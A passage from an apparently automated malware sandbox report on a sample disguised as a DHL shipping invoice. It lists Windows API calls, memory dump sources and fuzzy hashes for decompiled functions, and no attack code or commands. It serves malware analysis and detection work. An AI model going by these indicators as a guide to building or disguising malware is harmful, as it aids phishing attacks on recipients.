                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                                                                                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                                                                                                      • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                                                                                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                                                                                                      • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3859505661-0
                                                                                                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                      APIs
